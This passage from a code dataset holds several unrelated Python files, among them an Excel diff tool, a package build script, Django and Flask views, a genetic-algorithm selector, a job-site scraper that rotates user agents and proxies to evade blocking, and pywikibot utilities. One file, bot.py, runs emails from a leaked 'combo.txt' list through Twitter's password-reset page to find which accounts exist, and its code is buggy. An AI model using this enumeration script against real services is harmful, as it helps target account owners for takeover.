\r\n        }\r\n\r\n        for attr, value in sorted(args.__dict__.items()):\r\n            result[attr] = value\r\n\r\n        with open(args.result_path, \"wb\") as f:\r\n            pickle.dump(result, f, pickle.HIGHEST_PROTOCOL)\r\n\r\n\r\nif __name__ == '__main__':\r\n    main()","sub_path":"src/main_simaese_network.py","file_name":"main_simaese_network.py","file_ext":"py","file_size_in_byte":43051,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
{"seq_id":"633886776","text":"import argparse\nimport itertools\nimport os\nimport sys\n\nfrom openpyxl import Workbook, load_workbook\n\narg_parser = argparse.ArgumentParser()\n\narg_parser.add_argument(\"lhs_file\", type=str, help=\"\")\n\narg_parser.add_argument(\"rhs_file\", type=str, help=\"\")\n\nargs = arg_parser.parse_args()\n\nif not os.path.exists(args.lhs_file):\n    print(\n        \"error: path does not exist: {}\".format(args.lhs_file), file=sys.stderr\n    )\n    exit(1)\nif not os.path.exists(args.rhs_file):\n    print(\n        \"error: path does not exist: {}\".format(args.rhs_file), file=sys.stderr\n    )\n    exit(1)\n\nlhs_wb = load_workbook(args.lhs_file)\nrhs_wb = load_workbook(args.rhs_file)\n\nlhs_sheet = lhs_wb.active\nrhs_sheet = rhs_wb.active\n\nif lhs_sheet.max_row != rhs_sheet.max_row:\n    print(\"Excel files have different number of rows\")\n    exit(1)\nif lhs_sheet.max_column != rhs_sheet.max_column:\n    print(\"Excel files have different number of columns\")\n    exit(1)\n\nerrors = []\n# openpyxl rows and columns are 1-indexed and inclusive, so iterate through max_row/max_column\nfor row_num in range(1, lhs_sheet.max_row + 1):\n    for col_num in range(1, lhs_sheet.max_column + 1):\n        lhs_cell = lhs_sheet.cell(row=row_num, column=col_num)\n        rhs_cell = rhs_sheet.cell(row=row_num, column=col_num)\n        if lhs_cell.value != rhs_cell.value:\n            errors.append(\n                f\"Cell {lhs_cell}: '{lhs_cell.value}' != '{rhs_cell.value}'\"\n            )\n\nif errors:\n    print(\"Excel Diff: files are not equal:\")\n    for error in errors:\n        print(error)\n    exit(1)\n","sub_path":"tests/integration/excel_diff.py","file_name":"excel_diff.py","file_ext":"py","file_size_in_byte":1452,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
{"seq_id":"323118702","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n#\n# Copyright © 2005, 2006 TUBITAK/UEKAE\n# Licensed under the GNU General Public License, version 2.\n# See the file http://www.gnu.org/copyleft/gpl.txt.\n\nfrom pisi.actionsapi import autotools\nfrom pisi.actionsapi import shelltools\nfrom pisi.actionsapi import pisitools\nfrom pisi.actionsapi import get\n\nWorkDir = \"fpc\"\n\ndef build():\n    autotools.make(\"all\")\n\ndef install():\n    autotools.rawInstall(\"INSTALL_PREFIX=%s/usr\" % get.installDIR())\n    pisitools.dosym(\"/usr/lib/fpc/%s/ppc386\" % get.srcVERSION(), \"/usr/bin/ppc386\")\n\n    shelltools.system(\"%s/usr/lib/fpc/%s/samplecfg /usr/lib/fpc/%s %s/etc\" \\\n                      % (get.installDIR(), get.srcVERSION(), \\\n                         get.srcVERSION(), get.installDIR()))\n\n    pisitools.rename(\"/usr/share/doc/fpc-%s\" % get.srcVERSION(), get.srcTAG())\n    pisitools.dodoc(\"compiler/COPYING\", \"compiler/README*\", \"fcl/COPYING.*\")\n\n    autotools.make(\"clean\")\n    pisitools.dodir(\"/usr/share/fpcsrc\")\n    for tree in (\"compiler\", \"fcl\", \"fv\", \"ide\", \"installer\", \"packages\", \"rtl\", \"tests\", \"utils\"):\n        shelltools.copytree(\"%s/\" % tree, \"%s/usr/share/fpcsrc/%s\" % (get.installDIR(), tree))\n    shelltools.copy(\"Makefile*\", \"%s/usr/share/fpcsrc/\" % get.installDIR())\n\n    shelltools.system(\"find %s -name '.svn' -type d -exec rm -rf {} \\; 2>/dev/null\" % 
get.installDIR())\n\n","sub_path":"pardus/tags/2007-EOL/programming/languages/pascal/fpc/actions.py","file_name":"actions.py","file_ext":"py","file_size_in_byte":1365,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
{"seq_id":"625601339","text":"class Information:\n\n    \"\"\"\n    This class acts as an information packet.\n    Objects are created empty, passed around, filled and finally written to Excel\n    \"\"\"\n\n    url: str = \"\"\n    datum: str = \"\"\n    zeit: str = \"\"\n    postfach: str = \"\"\n    auftragsnummer = \"\"\n    ba_id = \"\"\n    filter_id = \"\"\n    vz_nummer = \"\"\n    bnr = \"\"\n    beanstandung = \"\"\n    kundencodierung = \"\"\n    wekstattcodierung = \"\"\n    postfach_filter = \"\"\n\n    class Ansprechpartner:\n        name = \"\"\n        tel = \"\"\n        plz = \"\"\n        ort = \"\"\n\n        def give_name(self):\n            \"\"\"\n            Returns the contact person on a single line\n            \"\"\"\n            return \"{} Tel: {} Adr: {} {}\".format(self.name, self.tel, self.plz, self.ort)\n\n    ansprechpartner = Ansprechpartner()
\n\n    class Fahrzeugdaten:\n        marke = \"\"\n        modell_jahr = \"\"\n        verkaufstyp = \"\"\n        verkaufstyp_beschreibung = \"\"\n        motor = \"\"\n        getriebe = \"\"\n        auslieferungs_datum = \"\"\n        fahrgestellnr = \"\"\n        laufleistung = \"\"\n\n        def print_info(self):\n            \"\"\"\n            Returns all vehicle data on a single line\n            \"\"\"\n            return \"Marke: {} ModellJahr: {} Verkaufstyp: {} VerkaufsTyp_Besch: {} Motor: {} \" \\\n                   \"Getriebe: {} AuslieferungsDatum: {} FahrgestellNr: {} Laufleistung: {}\".format(self.marke, self.modell_jahr, self.verkaufstyp, self.verkaufstyp_beschreibung\n                                                                                                   , self.motor, self.getriebe, self.auslieferungs_datum, self.fahrgestellnr, self.laufleistung)\n\n    fahrzeugdaten = Fahrzeugdaten()
\n\n    class Partnerdaten:\n        firma = \"\"\n        # ort = \"\"\n        # name = \"\"\n        # org_id = \"\"\n        # vs = \"\"\n        # region = \"\"\n        # tel = \"\"\n        # email = \"\"\n        # plz = \"\"\n        # straße = \"\"\n\n        # def print_info(self):\n        #     \"\"\"\n        #     Returns the partner data on a single line\n        #     \"\"\"\n        #     return \"Firma : {}, Ort: {}, Name: {}, Org-ID: {}, VS: {}, Region: {}, Tel: {}, Email: {}, PLZ: {}, Straße: {}\"\\\n        #         .format(self.firma, self.ort, self.name, self.org_id, self.vs, self.region, self.tel, self.email, self.plz, self.straße)\n\n    partnerdaten = Partnerdaten()\n","sub_path":"Python/lib/Information.py","file_name":"Information.py","file_ext":"py","file_size_in_byte":2335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
{"seq_id":"359567033","text":"import numpy as np\n\n\nclass ParentSelectorASRS(object):\n    pop_size = 0\n    reproduction_num = 0\n    roulette_constant = 0\n\n    roulette_fit_array = None\n    roulette_fit_sum = 0.0\n\n    def __init__(self, pop_size=0, reproduction_num=1, roulette_constant=2):\n        self.pop_size = pop_size\n        self.reproduction_num = reproduction_num\n        self.roulette_constant = roulette_constant\n\n    def initialize_roulette_array(self, current_pop):\n        roulette_fit_array = np.zeros(self.pop_size, dtype=np.float64)\n        for i in range(0, self.pop_size):\n            roulette_fit_array[i] = current_pop.chromosome_list[i].fitness\n        roulette_fit_array = (current_pop.worst_fitness - current_pop.best_fitness) / (self.roulette_constant - 1)\\\n            + current_pop.worst_fitness - roulette_fit_array\n        self.roulette_fit_array = roulette_fit_array.cumsum()\n        self.roulette_fit_sum = self.roulette_fit_array[-1]\n\n    def get_good_parent(self):\n        if self.roulette_fit_array[-1] == 0:\n            parent_index = np.random.randint(0, self.pop_size)\n        else:\n            roulette = np.random.rand() * 
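self.roulette_fit_sum\n            # [editor's note] A tiny sketch of this cumulative-sum roulette wheel (illustrative\n            # only): np.searchsorted on the cumulative array is equivalent to the\n            # (cumulative < spin).argmin() lookup used below.\n            #     fits = np.array([0.2, 0.5, 0.3]); wheel = fits.cumsum()\n            #     spin = np.random.rand() * wheel[-1]\n            #     chosen = int(np.searchsorted(wheel, spin))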
self.roulette_fit_sum\n parent_index = (self.roulette_fit_array < roulette).argmin()\n return parent_index\n\n def get_not_similar_parent(self):\n pass\n\n def get_parents(self, current_pop):\n self.initialize_roulette_array(current_pop)\n parents_pair_dic = {}\n for i in range(0, self.reproduction_num):\n parents_idx_list = []\n while len(parents_idx_list) < 2:\n parent_idx = self.get_good_parent()\n if not(parent_idx in parents_idx_list):\n parents_idx_list.append(parent_idx)\n parents_pair_dic[i] = parents_idx_list\n return parents_pair_dic","sub_path":"GA/genetic_operator/selection.py","file_name":"selection.py","file_ext":"py","file_size_in_byte":1803,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"309304452","text":"\nfrom selenium import webdriver\nfrom webdriver_manager.chrome import ChromeDriverManager\n#fname = input(\"Enter A File Name :\") #comment that if u wanna the script work automatic after that folow NEXT Line \nffile = open('combo.txt') #changing ffile = open('YOUR FILE NAME ')\nbrowser = webdriver.Chrome(ChromeDriverManager().install())\nusername = 'https://twitter.com/account/verify_user_info'\n#Web_Page\nbrowser.get('https://twitter.com/account/begin_password_reset')\nwhile True :\n for line in ffile :\n mail_ = line.split(':')[0]\n #pass_ = line.split(':')[1]\n # Twitter credentials\n tw_email = str(mail_)\n # Fill credentials\n browser.find_element_by_name(\"account_identifier\").send_keys(tw_email)\n # Click.Button Search\n browser.find_element_by_xpath(\"/html/body/div[2]/div/form/input[3]\").click() #Search_button\n browser.find_element_by_xpath('/html/body/div[2]/div/form/input[2]').click() #reset button click\n \n if browser.find_element_by_xpath('/html/body/div[2]/div/form/ul/li[2]/label/input[2]') is True :\n browser.find_element_by_xpath('/html/body/div[2]/div/form/ul/li[2]/label/input[2]').click() \n \n #Chosing email input radio button\n \n elif browser.find_element('
Verify your personal information
') is True :\n print(tw_email)\n continue\n else:\n print(\"INVALID INPUT -- - - ADD MORE LINES \")\n break #BY hithmast\n","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":1567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"543929296","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2019/8/21 11:09\n# @Author : Hanxiaoshun@天谕传说\n# @Site : www.shunzi666.cn\n# @File :\n# @Version : 1.2\n# @Mail : 1425814646@qq.com\n# @Software: PyCharm 2019.2\nimport json\nimport time\nimport requests\nimport re\nimport random\nimport os\n\nfrom bs4 import BeautifulSoup\nimport math\nimport pandas as pd\nimport sys\nimport io\n\nsys.stdout = io.TextIOWrapper(sys.stdout.buffer, encoding='utf-8')\ndate_time_str = str(time.strftime('%Y-%m-%d_%H-%M-%S', time.localtime(time.time())))\n\n# ---------------------\njob_df = []\njobs_info = []\nuniq_company_jobs_info = []\n# requests 的简单设置\nrequests.adapters.DEFAULT_RETRIES = 5\ns = requests.session()\ns.keep_alive = False\n\nuser_agent = 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36'\n\nrequests.packages.urllib3.disable_warnings()\n# 设置一些比较稳定的请求头信息,这个爬虫设置是非常重要的,\n# 一些简单的反爬虫基本上会过滤请求头,如果是requests等爬虫工具的默认请求头,则很容易被禁\n# 这样可以做到非常简单的伪装,以下是我简单搜集的请求头分享出来\nmain_user_agent = [\n 'Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36',\n 'Mozilla/5.0 (Windows NT 10.0; …) Gecko/20100101 Firefox/61.0',\n 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko',\n 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36',\n 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.33 Safari/537.36',\n 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0',\n 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE',\n 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50IE 9.0',\n 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0;IE 8.0',\n 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)IE 7.0',\n 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)IE 6.0',\n 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)Firefox 4.0.1 – MAC',\n 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0.1) Gecko/20100101 Firefox/4.0.1Firefox 4.0.1 – Windows',\n 'Mozilla/5.0 (Windows NT 6.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1Opera 11.11 – MAC',\n 'Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; en) Presto/2.8.131 Version/11.11Opera 11.11 – Windows',\n 'Opera/9.80 (Windows NT 6.1; U; en) Presto/2.8.131 Version/11.11Chrome 17.0 – MAC',\n 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11傲游(Maxthon)',\n 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Maxthon 2.0)腾讯TT',\n 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; TencentTraveler 4.0)世界之窗(The World) 2.x',\n 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)世界之窗(The World) 3.x',\n 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; The World)搜狗浏览器 1.x',\n 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; SE 2.X MetaSr 1.0; SE 2.X MetaSr 1.0; .NET CLR 2.0.50727; SE 2.X MetaSr 1.0)360浏览器',\n 'Mozilla/4.0 
(compatible; MSIE 7.0; Windows NT 5.1; 360SE)Avant',\n 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Avant Browser)Green Browser',\n 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)',\n 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50IE 9.0'\n]\n\n# 设置一些比较稳定的IP代理(样例)\nmain_proxies = ['https://106.56.102.22:8070',\n 'https://211.159.171.58:80', ]\n\n\nclass SpiderDomainInfo(object):\n \"\"\"\n 域名将详细文件手动转化成excel\n \"\"\"\n\n def __init__(self):\n \"\"\"\n 初始化参数信息\n \"\"\"\n self.session = requests.session()\n self.cookies = requests.cookies.RequestsCookieJar()\n self.verify_URL = \"\"\n self.img_path = \"\"\n self.origin = \"\"\n self.host = \"\"\n self.accept = \"\"\n self.referer = \"\"\n self.getUrl = \"\"\n self.portUrl = \"\"\n self.verifyCode = 0\n self.payloadData = {}\n self.user_money = 0.0 # 用户的余额\n self.total_money = 0.0 # 本次批量订购的总价\n self.set_domain = set()\n self.pages = 0\n self.uniq_company = []\n\n def load_uniq_detail_history(self):\n \"\"\"\n 加载历史数据\n :return:\n \"\"\"\n try:\n files = \"files\"\n dirs = os.listdir(\"files\")\n if dirs.__len__() > 0:\n for file in dirs:\n if \"detail\" in file:\n sub_file = os.path.join(files, file)\n with open(sub_file, 'r', encoding='utf-8') as f:\n if f.__sizeof__() > 0:\n for line in f.readlines():\n if line.__len__() > 0:\n if \"--==--==--\" in line:\n line = line[:line.index('--==--==--')]\n lines = line.split('\\t')\n if len(lines) > 0:\n company = lines[0]\n if company not in self.uniq_company:\n self.uniq_company.append(company)\n job_df.append(lines)\n else:\n pass\n else:\n pass\n else:\n pass\n else:\n pass\n else:\n pass\n else:\n pass\n except Exception as load_uniq_detail_e:\n input(\"make_excel 发生异常:\" + str(load_uniq_detail_e))\n with open(\"files/51job_error.txt\", 'a', encoding='utf-8') as f_err:\n f_err.write(date_time_str + \":load_uniq_detail 发生异常:\" + str(load_uniq_detail_e))\n input(\"发生异常请记录一下错误并按任意键退出!\")\n raise load_uniq_detail_e\n\n def make_excel(self):\n # print(job_df)\n try:\n page_path = 'excel'\n if os.path.exists(page_path):\n if len(os.listdir(page_path)) > 0:\n for file in os.listdir(page_path):\n os.remove(os.path.join(page_path, file))\n else:\n os.makedirs(page_path)\n\n data = pd.DataFrame(job_df)\n # 保存数据\n with pd.ExcelWriter(page_path + '/51jobs_' + date_time_str + '.xlsx') as writer: # doctest: +SKIP\n data.to_excel(writer, sheet_name='51job', index=True, header=0, na_rep='')\n except Exception as make_excel_e:\n input(\"make_excel 发生异常:\" + str(make_excel_e))\n with open(\"files/51job_error.txt\", 'a', encoding='utf-8') as f_err:\n f_err.write(date_time_str + \":make_excel 发生异常:\" + str(make_excel_e))\n input(\"发生异常请记录一下错误并按任意键退出!\")\n raise make_excel_e\n\n def entrance(self):\n try:\n self.load_uniq_detail_history()\n self.make_excel()\n except Exception as entrance_e:\n print(\"entrance 发生异常:\" + str(entrance_e))\n with open(\"files/51job_error.txt\", 'a', encoding='utf-8') as f_err:\n f_err.write(date_time_str + \":entrance 发生异常:\" + str(entrance_e))\n input(\"发生异常请记录一下错误并按任意键退出!\")\n raise entrance_e\n\n\nif __name__ == '__main__':\n \"\"\"\n Boss直聘采集\n 说明:\n 1、处理待检测域名\n 方法:\n \"\"\"\n # 如果域名列表文件检查成功则继续,否则不继续...\n start = time.time()\n spider = SpiderDomainInfo()\n try:\n spider.entrance()\n end = time.time()\n print('Used time-->', end - start, 's')\n except Exception as main_e:\n print(str(main_e))\n with open(\"files/51job_error.txt\", 'a', encoding='utf-8') as f_err:\n f_err.write(date_time_str + \":main 发生异常:\" 
+ str(main_e))\n input(\"发生异常请记录一下错误并按任意键退出!\")\n raise main_e\n input('excel 文件已生成,请按任意键退出,或直接关闭窗口.')\n","sub_path":"spider/boss_zhipin/create_excel.py","file_name":"create_excel.py","file_ext":"py","file_size_in_byte":9029,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"601288683","text":"from django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.shortcuts import render\nfrom django.urls import reverse_lazy\nfrom django.views.generic import CreateView, DeleteView, DetailView, ListView, UpdateView\n\nfrom .models import Expense\nfrom .forms import ExpenseForm\n\nclass AddExpense(LoginRequiredMixin, CreateView):\n\tmodel = Expense\n\tform_class = ExpenseForm\n\ttemplate_name = 'expenses/add_expense.html'\n\n\nclass DeleteExpense(LoginRequiredMixin, DeleteView):\n\tmodel = Expense\n\ttemplate_name = 'bookings/confirm_delete.html'\n\tsuccess_url = reverse_lazy('expenses')\n\n\nclass EditExpense(LoginRequiredMixin, UpdateView):\n\tmodel = Expense\n\tform_class = ExpenseForm\n\ttemplate_name = 'expenses/edit_expense.html'\n\n\nclass ExpenseDetails(LoginRequiredMixin, DetailView):\n\tmodel = Expense\n\ttemplate_name = 'expenses/expense_detail.html'\n\tcontext_object_name = 'expense'\n\nclass ExpensesList(LoginRequiredMixin, ListView):\n\tmodel = Expense\n\ttemplate_name = 'expenses/expenses.html'\n\tcontext_object_name = 'expenses'\n\n","sub_path":"expenses/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1021,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"211994824","text":"# -*- coding: utf-8 -*-\n\nfrom flask import render_template, request, g, jsonify, abort\nfrom cerberus import Validator\nfrom bookhouse.core import app, db\nfrom bookhouse.main.misc.auth import auth_required\nfrom bookhouse.models.book import Book\nfrom bookhouse.models.user import User\nfrom bookhouse.main.misc.errors import ViewProcessJump\n\n\n@app.route('/index/', methods=['GET'])\n@app.route('/my/books/', methods=['GET'])\ndef books_page():\n return render_template('book_house.html')\n\n\n@app.route('/api/books/', methods=['GET', 'POST'])\n@auth_required\ndef books_api():\n limit_number =2\n if request.method == 'GET':\n request_data = request.args\n if request_data is None:\n raise ViewProcessJump(code='ILLEGAL_GET_REQUEST')\n before_id = int(request_data['before_id'])\n user = g.user\n if before_id == 0:\n items = Book.query.filter(db.text('user_id = :uid')).params(uid=user.id).order_by(Book.id.desc()).limit(limit_number)\n elif before_id > 0:\n items = Book.query.filter(db.text(\n 'user_id = :uid and id < :before_id'\n )).params(\n uid=user.id, before_id=before_id\n ).order_by(Book.id.desc()).limit(limit_number)\n resp_data = {\n 'status': 'success',\n 'data': {\n 'books': [{\n 'book_id': item.id,\n 'book_name': item.name,\n 'book_price': item.price,\n 'book_intro': item.intro,\n 'book_owner': user.name\n } for item in items]\n }\n }\n if len(resp_data['data']['books']) < limit_number:\n resp_data['data']['next_disable'] = True\n return jsonify(**resp_data)\n elif request.method == 'POST':\n request_data = request.json\n validator = Validator({\n 'book_name': {\n 'type': 'string',\n 'minlength': 2,\n 'maxlength': 30,\n 'required': True,\n },\n 'book_price': {\n 'required': True,\n },\n \"book_intro\": {\n 'type': 'string',\n },\n })\n if not validator.validate(request_data):\n resp_data = {\n 'status': 'fail',\n 'data': {\n 'code': 1,\n 'message': 'validate error',\n }\n 
}\n return jsonify(**resp_data)\n book = Book(\n name=request_data['book_name'],\n price=request_data['book_price'],\n intro=request_data['book_intro'],\n user_id=g.user.id\n )\n db.session.add(book)\n db.session.commit()\n return jsonify(**{})\n\n\n@app.route('/api/books//', methods=['GET', 'PUT', 'DELETE'])\n@auth_required\ndef book_api(book_id):\n book = Book.query.get(book_id)\n if not book:\n abort(400)\n if request.method == 'GET':\n\n resp_data = {\n 'book': {\n 'book_id': book.id,\n 'book_name': book.name,\n 'book_intro': book.intro,\n 'book_price': book.price,\n 'book_owner': User.query.get(int(book.user_id)).name\n }\n }\n return jsonify(**resp_data)\n elif request.method == 'PUT':\n request_data = request.json\n book.name = request_data['book_name']\n book.intro = request_data['book_intro']\n book.price = request_data['book_price']\n db.session.commit()\n return jsonify(**{})\n elif request.method == 'DELETE':\n db.session.delete(book)\n db.session.commit()\n return jsonify(**{})\n\n","sub_path":"bookhouse/main/views/book.py","file_name":"book.py","file_ext":"py","file_size_in_byte":3981,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"151623140","text":"import numpy as np\r\nimport scipy as sp\r\nimport csv\r\n\r\n\r\n## I'm implementing pandas for the first time here - so it may take a while\r\n## Using numoy arrays and wines\r\n\r\nclass Constructor:\r\n \"\"\" We analyze data in columns. Tuples are the individual data unit \"\"\"\r\n\r\n def __init__(self):\r\n self.wines = None\r\n \r\n def create_dataset():\r\n\r\n with open(\"winequality-white-small.csv\", 'r') as f:\r\n wines = list(csv.reader(f, delimiter=\";\"))\r\n ## Bug 2 -> Rounding to 2 decimal places in excel not python\r\n ## Bug 1 - for some reason - the column names are buggery\r\n import numpy as np\r\n wines = np.array(wines[1:], float)\r\n wines = wines.astype(int)\r\n ## Clean this up later - do ints for simplicity now\r\n ## third_wine = wines[3, :]\r\n ## third_wine[2] returns the 3rd wine\r\n ## wines[3] = returns a row\r\n \"\"\" At this point -> all the data is in an array \"\"\"\r\n ## wines[2,3] returns value 4th column third row\r\n ## wines[:, 3] returns column at 3\r\n self.wines = wines\r\n print(\"cat\")\r\n\r\n def number_of_cols_and_rows(self):\r\n print(self.wines[1].size())\r\n\r\n def standard_deviation():\r\n pass\r\n\r\n\r\nbase = Constructor()\r\nbase.number_of_cols_and_rows()\r\n\r\n\r\n #number_of_cols_and_rows(base)\r\n\r\n\r\n \r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"V0 - Nothing implemented.py","file_name":"V0 - Nothing implemented.py","file_ext":"py","file_size_in_byte":1387,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"327215639","text":"import pathlib\nimport yaml\n\nBASE_DIR = pathlib.Path(__file__)\nTEMPLATES_ROOT = str(BASE_DIR.parent / 'templates')\nconfig_path = BASE_DIR.parent.parent / 'config' / 'dones.yaml'\n\ndef get_config(path):\n with open(path) as f:\n config = yaml.safe_load(f)\n return config\n\nconfig = get_config(config_path)","sub_path":"aiohttp_dones/dones/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"83351749","text":"# -*- coding: utf-8 -*-\n\"\"\"Miscellaneous helper functions (not wiki-dependent).\"\"\"\n#\n# (C) Pywikibot team, 2008\n#\n# Distributed under the terms of the MIT license.\n#\nfrom __future__ 
import print_function\n__version__ = '$Id$'\n\nimport sys\nimport threading\nimport time\nfrom collections import Mapping\n\nif sys.version_info[0] > 2:\n import queue as Queue\nelse:\n import Queue\n\n\n# These variables are functions debug(str) and warning(str)\n# which are initially the builtin print function.\n# They exist here as the deprecators in this module rely only on them.\n# pywikibot updates these function variables in bot.init_handlers()\ndebug = warning = print\n\n\ndef empty_iterator():\n # http://stackoverflow.com/a/13243870/473890\n \"\"\"An iterator which does nothing.\"\"\"\n return\n yield\n\n\nclass UnicodeMixin(object):\n\n \"\"\"Mixin class to add __str__ method in Python 2 or 3.\"\"\"\n\n if sys.version_info[0] >= 3:\n def __str__(self):\n return self.__unicode__()\n else:\n def __str__(self):\n return self.__unicode__().encode('utf8')\n\n\n# From http://python3porting.com/preparing.html\nclass ComparableMixin(object):\n\n \"\"\"Mixin class to allow comparing to other objects of this class.\"\"\"\n\n def _compare(self, other, method):\n try:\n return method(self._cmpkey(), other._cmpkey())\n except (AttributeError, TypeError):\n # _cmpkey not implemented, or return different type,\n # so I can't compare with \"other\".\n return NotImplemented\n\n def __lt__(self, other):\n return self._compare(other, lambda s, o: s < o)\n\n def __le__(self, other):\n return self._compare(other, lambda s, o: s <= o)\n\n def __eq__(self, other):\n return self._compare(other, lambda s, o: s == o)\n\n def __ge__(self, other):\n return self._compare(other, lambda s, o: s >= o)\n\n def __gt__(self, other):\n return self._compare(other, lambda s, o: s > o)\n\n def __ne__(self, other):\n return self._compare(other, lambda s, o: s != o)\n\n\nclass ThreadedGenerator(threading.Thread):\n\n \"\"\"Look-ahead generator class.\n\n Runs a generator in a separate thread and queues the results; can\n be called like a regular generator.\n\n Subclasses should override self.generator, I{not} self.run\n\n Important: the generator thread will stop itself if the generator's\n internal queue is exhausted; but, if the calling program does not use\n all the generated values, it must call the generator's stop() method to\n stop the background thread. Example usage:\n\n >>> gen = ThreadedGenerator(target=xrange, args=(20,))\n >>> try:\n ... for data in gen:\n ... print data,\n ... finally:\n ... gen.stop()\n 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19\n\n \"\"\"\n\n def __init__(self, group=None, target=None, name=\"GeneratorThread\",\n args=(), kwargs=None, qsize=65536):\n \"\"\"Constructor. Takes same keyword arguments as threading.Thread.\n\n target must be a generator function (or other callable that returns\n an iterable object).\n\n @param qsize: The size of the lookahead queue. 
The larger the qsize,\n the more values will be computed in advance of use (which can eat\n up memory and processor time).\n @type qsize: int\n\n \"\"\"\n if kwargs is None:\n kwargs = {}\n if target:\n self.generator = target\n if not hasattr(self, \"generator\"):\n raise RuntimeError(\"No generator for ThreadedGenerator to run.\")\n self.args, self.kwargs = args, kwargs\n threading.Thread.__init__(self, group=group, name=name)\n self.queue = Queue.Queue(qsize)\n self.finished = threading.Event()\n\n def __iter__(self):\n \"\"\"Iterate results from the queue.\"\"\"\n if not self.isAlive() and not self.finished.isSet():\n self.start()\n # if there is an item in the queue, yield it, otherwise wait\n while not self.finished.isSet():\n try:\n yield self.queue.get(True, 0.25)\n except Queue.Empty:\n pass\n except KeyboardInterrupt:\n self.stop()\n\n def stop(self):\n \"\"\"Stop the background thread.\"\"\"\n self.finished.set()\n\n def run(self):\n \"\"\"Run the generator and store the results on the queue.\"\"\"\n self.__gen = self.generator(*self.args, **self.kwargs)\n for result in self.__gen:\n while True:\n if self.finished.isSet():\n return\n try:\n self.queue.put_nowait(result)\n except Queue.Full:\n time.sleep(0.25)\n continue\n break\n # wait for queue to be emptied, then kill the thread\n while not self.finished.isSet() and not self.queue.empty():\n time.sleep(0.25)\n self.stop()\n\n\ndef itergroup(iterable, size):\n \"\"\"Make an iterator that returns lists of (up to) size items from iterable.\n\n Example:\n\n >>> i = itergroup(xrange(25), 10)\n >>> print next(i)\n [0, 1, 2, 3, 4, 5, 6, 7, 8, 9]\n >>> print next(i)\n [10, 11, 12, 13, 14, 15, 16, 17, 18, 19]\n >>> print next(i)\n [20, 21, 22, 23, 24]\n >>> print next(i)\n Traceback (most recent call last):\n ...\n StopIteration\n\n \"\"\"\n group = []\n for item in iterable:\n group.append(item)\n if len(group) == size:\n yield group\n group = []\n if group:\n yield group\n\n\nclass ThreadList(list):\n\n \"\"\"A simple threadpool class to limit the number of simultaneous threads.\n\n Any threading.Thread object can be added to the pool using the append()\n method. If the maximum number of simultaneous threads has not been reached,\n the Thread object will be started immediately; if not, the append() call\n will block until the thread is able to start.\n\n >>> pool = ThreadList(limit=10)\n >>> def work():\n ... time.sleep(1)\n ...\n >>> for x in xrange(20):\n ... pool.append(threading.Thread(target=work))\n ...\n\n \"\"\"\n\n def __init__(self, limit=128, *args):\n self.limit = limit\n list.__init__(self, *args)\n for item in list(self):\n if not isinstance(threading.Thread, 